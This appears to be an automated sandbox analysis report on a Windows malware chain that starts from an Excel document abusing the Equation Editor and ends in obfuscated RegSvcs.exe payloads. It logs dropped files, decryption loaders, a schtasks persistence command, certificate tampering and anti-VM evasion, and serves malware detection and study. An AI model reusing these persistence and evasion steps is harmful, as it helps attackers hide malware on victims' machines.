Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

5_2_00FE3EC5

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}

Source: C:\Users\Public\vbc.exe	Command line argument: ps*	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: sfxname	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: sfxstime	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: STARTDLG	4_2_0027CBB8

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E336 push ecx; ret	4_2_0027E349
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027D870 push eax; ret	4_2_0027D88E
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC6BD5 push ecx; ret	5_2_00FC6BE8

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4531298

Jump to behavior

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Show sources

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\mmuiqlcvwo.pif

Jump to dropped file

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\33920049\mmuiqlcvwo.pif	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_00FE43FF
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_0102A2EA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Yara detected AntiVM autoit script

Show sources

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 4838 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep time: -48380s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 3937 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep time: -39370s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 110 > 30	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 4838 delay: -10			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 3937 delay: -10			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
